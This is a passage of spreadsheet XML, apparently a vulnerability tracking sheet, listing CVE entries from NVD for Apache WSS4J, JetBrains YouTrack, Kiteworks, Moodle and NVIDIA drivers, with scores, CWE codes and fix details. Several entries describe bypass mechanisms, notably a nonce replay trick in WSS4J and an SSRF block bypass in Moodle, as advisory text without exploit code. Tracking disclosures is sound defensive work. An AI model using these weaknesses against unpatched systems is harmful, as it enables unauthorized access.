          <t>Apache WSS4J remembers the Nonce of each UsernameToken it accepts, so a captured token cannot be reused. It stored the Nonce as raw base64 text, but authentication decodes that text and uses the bytes.The same bytes can be written as base64 in several ways. An attacker who captured an authenticated request could re-send it with a space added to the Nonce: the password digest still verified, but the token no longer matched the remembered one, so the replay was accepted. Since a UsernameToken does not cover the message body, the captured token could then be reused on requests of the attacker's choosing until it expired. Affects deployments with a nonce replay cache configured, as Apache CXF has by default, and only tokens using a password digest. The cache is now keyed on the decoded Nonce. Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92899</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100263</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q534" s="5" t="inlineStr"/>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S534" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 stored HTML injection via the User-Agent header was possible</t>
        </is>
      </c>
      <c r="T534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100263</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102107</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q535" s="5" t="inlineStr"/>
      <c r="R535" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S535" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core contains a business logic flaw in a Kiteworks file-request feature allowed an authenticated user to send a request that appeared to originate from another user, because the server did not verify that the requester was authorized to act as the specified account. This could be used to solicit files or information from a recipient under a trusted identity; exploitation requires the feature to be enabled for the attacker's profile and the targeted recipient to act on the request.</t>
        </is>
      </c>
      <c r="T535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102107</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102581</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q536" s="5" t="inlineStr"/>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S536" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. Insufficient output escaping in templates used to display forum posts enables a stored cross-site scripting (XSS) vulnerability. An attacker can inject malicious content into a forum post, which then executes arbitrary script code in the browser of another user viewing the affected post.</t>
        </is>
      </c>
      <c r="T536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102581</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47526</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="inlineStr"/>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q537" s="5" t="inlineStr"/>
      <c r="R537" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S537" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause a null pointer dereference. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47526</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47531</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="inlineStr"/>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q538" s="5" t="inlineStr"/>
      <c r="R538" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S538" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause a null pointer dereference. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47531</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47562</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="inlineStr"/>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q539" s="5" t="inlineStr"/>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S539" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could inject crafted text into the kernel log because the supplied version string is not properly sanitized. A successful exploit of this vulnerability might lead to denial of service and data tampering.</t>
        </is>
      </c>
      <c r="T539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47562</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100257</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q540" s="5" t="inlineStr"/>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S540" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 sSRF via stored XHTML injection was possible during PDF export</t>
        </is>
      </c>
      <c r="T540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100257</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100258</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="inlineStr"/>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q541" s="5" t="inlineStr"/>
      <c r="R541" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S541" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 missing authorisation allowed read-only users to read project settings</t>
        </is>
      </c>
      <c r="T541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100258</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100259</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="inlineStr"/>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q542" s="5" t="inlineStr"/>
      <c r="R542" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S542" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 improper access control on Gantt chart allowed edits by users with view-only access</t>
        </is>
      </c>
      <c r="T542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100259</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100269</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="inlineStr"/>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q543" s="5" t="inlineStr"/>
      <c r="R543" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S543" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 helpdesk project's Authorized Reporters list could be bypassed</t>
        </is>
      </c>
      <c r="T543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100269</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102090</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="inlineStr"/>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q544" s="5" t="inlineStr"/>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S544" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.1 is vulnerable to Content Injection. A URL parameter in the PDF viewer was insufficiently validated, allowing an attacker-controlled document to be loaded and displayed under the trust of the legitimate application domain. This could increase the credibility of phishing attempts relying on malicious links embedded in the displayed content.</t>
        </is>
      </c>
      <c r="T544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102090</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102122</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q545" s="5" t="inlineStr"/>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S545" s="5" t="inlineStr">
        <is>
          <t>Kiteworks did not correctly enforce which roles a shared folder's manager was permitted to assign. In a default configuration, an authenticated user holding the Manager role on a folder could grant the Owner role to themselves or to other members of that folder.</t>
        </is>
      </c>
      <c r="T545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102122</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102577</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q546" s="5" t="inlineStr"/>
      <c r="R546" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S546" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. Incorrect handling of IPv4-mapped IPv6 addresses within the URL downloader's host-blocking logic allows an authenticated remote user to bypass blocked-host restrictions. By supplying a crafted URL, an attacker can induce the server to make requests to restricted destinations, leading to Server-Side Request Forgery (SSRF).</t>
        </is>
      </c>
      <c r="T546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102577</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102579</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr"/>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q547" s="5" t="inlineStr"/>
      <c r="R547" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="S547" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. An incorrect capability check in the grade web service allows an authenticated student to access profile information of other students enrolled in the same course that they should not have permission to view. This issue leads to unauthorized information disclosure.</t>
        </is>
      </c>
      <c r="T547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102579</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102584</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="inlineStr"/>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q548" s="5" t="inlineStr"/>
      <c r="R548" s="5" t="inlineStr">
        <is>
          <t>CWE-425</t>
        </is>
      </c>
      <c r="S548" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. Due to a missing capability check, a low-privileged authenticated user can trigger the recalculation of grade penalties without holding the required permissions. This issue allows unauthorized users to modify grade penalty records, potentially altering student assessment scores.</t>
        </is>
      </c>
      <c r="T548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102584</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102585</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="inlineStr"/>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr"/>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q549" s="5" t="inlineStr"/>
      <c r="R549" s="5" t="inlineStr">
        <is>
          <t>CWE-842</t>
        </is>
      </c>
      <c r="S549" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. When enrolling a user into a course while assigning them to a group, the application does not verify whether the selected group actually belongs to that course. An authenticated user with teacher privileges could exploit this flaw to add users to groups within courses they do not have authorization to access.</t>
        </is>
      </c>
      <c r="T549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102585</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102586</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="inlineStr"/>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr"/>
